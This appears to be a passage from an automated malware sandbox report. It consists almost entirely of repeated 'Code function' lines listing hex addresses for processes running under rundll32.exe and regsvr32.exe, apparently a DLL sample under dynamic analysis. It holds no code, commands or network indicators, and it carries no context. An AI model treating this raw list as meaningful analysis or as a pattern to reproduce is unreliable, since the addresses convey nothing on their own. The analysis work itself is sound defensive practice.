                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180020CFC3_2_0000000180020CFC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C9043_2_000000018002C904
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800179083_2_0000000180017908
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800215103_2_0000000180021510
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F9173_2_000000018000F917
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000551C3_2_000000018000551C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F1283_2_000000018000F128
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001CD383_2_000000018001CD38
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180016D3C3_2_0000000180016D3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F9443_2_000000018001F944
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800181483_2_0000000180018148
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001ED503_2_000000018001ED50
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800131503_2_0000000180013150
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D9503_2_000000018001D950
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E9603_2_000000018001E960
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019D603_2_0000000180019D60
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001C9643_2_000000018001C964
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180001D683_2_0000000180001D68
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001496C3_2_000000018001496C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002D703_2_0000000180002D70
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800021783_2_0000000180002178
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180024D803_2_0000000180024D80
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800185983_2_0000000180018598
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800035983_2_0000000180003598
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002A9A83_2_000000018002A9A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800119A83_2_00000001800119A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180025DAC3_2_0000000180025DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180018DAC3_2_0000000180018DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800269B03_2_00000001800269B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800059B83_2_00000001800059B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800029BC3_2_00000001800029BC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800141C03_2_00000001800141C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800125C43_2_00000001800125C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800121CC3_2_00000001800121CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800075D43_2_00000001800075D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800095DC3_2_00000001800095DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F9E83_2_000000018000F9E8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800026103_2_0000000180002610
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800196183_2_0000000180019618
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180013E283_2_0000000180013E28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001FA383_2_000000018001FA38
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000A2703_2_000000018000A270
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019E783_2_0000000180019E78
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DA803_2_000000018001DA80
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800246983_2_0000000180024698
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000EE983_2_000000018000EE98
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800176B83_2_00000001800176B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AAB83_2_000000018001AAB8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180011AD03_2_0000000180011AD0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180008AD83_2_0000000180008AD8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800296EC3_2_00000001800296EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000A6EC3_2_000000018000A6EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800132F03_2_00000001800132F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800193003_2_0000000180019300
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BB043_2_000000018001BB04
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002870C3_2_000000018002870C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180026B103_2_0000000180026B10
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000131C3_2_000000018000131C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000671C3_2_000000018000671C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180029B283_2_0000000180029B28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180012F283_2_0000000180012F28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000BB283_2_000000018000BB28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001EB303_2_000000018001EB30
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800203343_2_0000000180020334
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800107583_2_0000000180010758
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001435C3_2_000000018001435C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180009F5C3_2_0000000180009F5C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800293683_2_0000000180029368
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800207683_2_0000000180020768
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800173783_2_0000000180017378
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800137803_2_0000000180013780
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800153883_2_0000000180015388
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000338C3_2_000000018000338C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000738C3_2_000000018000738C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800027903_2_0000000180002790
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800197A03_2_00000001800197A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C7B43_2_000000018002C7B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DFB43_2_000000018001DFB4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F7C03_2_000000018001F7C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800097C03_2_00000001800097C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800157D83_2_00000001800157D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019FDC3_2_0000000180019FDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180017BDC3_2_0000000180017BDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F7E03_2_000000018000F7E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180001FE03_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000023396DB00003_2_0000023396DB0000
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180010FF44_2_0000000180010FF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002C0584_2_000000018002C058
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800091004_2_0000000180009100
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000C6084_2_000000018000C608
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800216184_2_0000000180021618
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E3AC4_2_000000018001E3AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DBE84_2_000000018001DBE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001FC0C4_2_000000018001FC0C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000580C4_2_000000018000580C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800220104_2_0000000180022010
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001481C4_2_000000018001481C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002A42C4_2_000000018002A42C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800118344_2_0000000180011834
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180021C3C4_2_0000000180021C3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000703C4_2_000000018000703C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000AC484_2_000000018000AC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000FC484_2_000000018000FC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800064584_2_0000000180006458
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001C05C4_2_000000018001C05C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001A4604_2_000000018001A460
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800298884_2_0000000180029888
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001D49C4_2_000000018001D49C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180008CA04_2_0000000180008CA0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800248A84_2_00000001800248A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180015CB04_2_0000000180015CB0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800124B44_2_00000001800124B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000C4B44_2_000000018000C4B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800288B84_2_00000001800288B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800024B84_2_00000001800024B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000D8C44_2_000000018000D8C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800250CC4_2_00000001800250CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800190D44_2_00000001800190D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180017CE44_2_0000000180017CE4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800264F04_2_00000001800264F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800014F84_2_00000001800014F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180020CFC4_2_0000000180020CFC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002C9044_2_000000018002C904
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800179084_2_0000000180017908
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800215104_2_0000000180021510
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F9174_2_000000018000F917
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000551C4_2_000000018000551C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F1284_2_000000018000F128
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001CD384_2_000000018001CD38
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180016D3C4_2_0000000180016D3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001F9444_2_000000018001F944
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800181484_2_0000000180018148
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001ED504_2_000000018001ED50
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800131504_2_0000000180013150
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001D9504_2_000000018001D950
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E9604_2_000000018001E960
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019D604_2_0000000180019D60
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001C9644_2_000000018001C964
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180001D684_2_0000000180001D68
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001496C4_2_000000018001496C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180002D704_2_0000000180002D70
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800021784_2_0000000180002178
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180024D804_2_0000000180024D80
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800185984_2_0000000180018598
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800035984_2_0000000180003598
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002A9A84_2_000000018002A9A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800119A84_2_00000001800119A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180025DAC4_2_0000000180025DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180018DAC4_2_0000000180018DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800269B04_2_00000001800269B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800059B84_2_00000001800059B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800029BC4_2_00000001800029BC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800141C04_2_00000001800141C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800125C44_2_00000001800125C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800121CC4_2_00000001800121CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800075D44_2_00000001800075D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800095DC4_2_00000001800095DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F9E84_2_000000018000F9E8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800026104_2_0000000180002610
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800196184_2_0000000180019618
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180013E284_2_0000000180013E28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001FA384_2_000000018001FA38
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000A2704_2_000000018000A270
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019E784_2_0000000180019E78
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DA804_2_000000018001DA80
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800246984_2_0000000180024698
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000EE984_2_000000018000EE98
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800176B84_2_00000001800176B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AAB84_2_000000018001AAB8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180011AD04_2_0000000180011AD0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180008AD84_2_0000000180008AD8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800296EC4_2_00000001800296EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000A6EC4_2_000000018000A6EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800132F04_2_00000001800132F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800193004_2_0000000180019300
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BB044_2_000000018001BB04
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002870C4_2_000000018002870C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180026B104_2_0000000180026B10
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000131C4_2_000000018000131C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000671C4_2_000000018000671C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180029B284_2_0000000180029B28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180012F284_2_0000000180012F28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000BB284_2_000000018000BB28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001EB304_2_000000018001EB30
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800203344_2_0000000180020334
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800107584_2_0000000180010758
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001435C4_2_000000018001435C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180009F5C4_2_0000000180009F5C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800293684_2_0000000180029368
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800207684_2_0000000180020768
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800173784_2_0000000180017378
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800137804_2_0000000180013780
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800153884_2_0000000180015388
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000338C4_2_000000018000338C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000738C4_2_000000018000738C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800027904_2_0000000180002790
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800197A04_2_00000001800197A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002C7B44_2_000000018002C7B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DFB44_2_000000018001DFB4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001F7C04_2_000000018001F7C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800097C04_2_00000001800097C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800157D84_2_00000001800157D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019FDC4_2_0000000180019FDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180017BDC4_2_0000000180017BDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F7E04_2_000000018000F7E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180001FE04_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000002077EEB00004_2_000002077EEB0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_007500006_2_00750000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180010FF46_2_0000000180010FF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180028C206_2_0000000180028C20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002C0586_2_000000018002C058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001ACA46_2_000000018001ACA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000551C6_2_000000018000551C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800181486_2_0000000180018148
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001496C6_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000E1E06_2_000000018000E1E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000C6086_2_000000018000C608
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800216186_2_0000000180021618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180013E286_2_0000000180013E28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002AE446_2_000000018002AE44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D26C6_2_000000018000D26C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800252786_2_0000000180025278
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000EE986_2_000000018000EE98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800046A86_2_00000001800046A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001AAB86_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180004ACA6_2_0000000180004ACA
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800132F06_2_00000001800132F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180026B106_2_0000000180026B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001DBE86_2_000000018001DBE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001FC0C6_2_000000018001FC0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000580C6_2_000000018000580C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800220106_2_0000000180022010
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001481C6_2_000000018001481C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002A42C6_2_000000018002A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800118346_2_0000000180011834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180021C3C6_2_0000000180021C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000703C6_2_000000018000703C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000AC486_2_000000018000AC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000FC486_2_000000018000FC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800244586_2_0000000180024458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800064586_2_0000000180006458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001C05C6_2_000000018001C05C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001A4606_2_000000018001A460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800298886_2_0000000180029888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001D49C6_2_000000018001D49C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180008CA06_2_0000000180008CA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800248A86_2_00000001800248A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180015CB06_2_0000000180015CB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800124B46_2_00000001800124B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000C4B46_2_000000018000C4B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800288B86_2_00000001800288B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800024B86_2_00000001800024B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D8C46_2_000000018000D8C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800250CC6_2_00000001800250CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800190D46_2_00000001800190D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180017CE46_2_0000000180017CE4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800264F06_2_00000001800264F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800014F86_2_00000001800014F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180020CFC6_2_0000000180020CFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800091006_2_0000000180009100
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002C9046_2_000000018002C904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800179086_2_0000000180017908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800215106_2_0000000180021510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F9176_2_000000018000F917
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F1286_2_000000018000F128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001CD386_2_000000018001CD38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180016D3C6_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F9446_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001D9506_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800131506_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001ED506_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001E9606_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180019D606_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001C9646_2_000000018001C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001C5686_2_000000018001C568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180001D686_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180002D706_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800245746_2_0000000180024574
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800021786_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180024D806_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800185986_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800035986_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F1A46_2_000000018001F1A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002A9A86_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800119A86_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180025DAC6_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180018DAC6_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800269B06_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800059B86_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800029BC6_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800141C06_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800125C46_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800121CC6_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BDD06_2_000000018000BDD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800075D46_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800095DC6_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F9E86_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800026106_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800196186_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001FA386_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000A2706_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180019E786_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001DA806_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800246986_2_0000000180024698
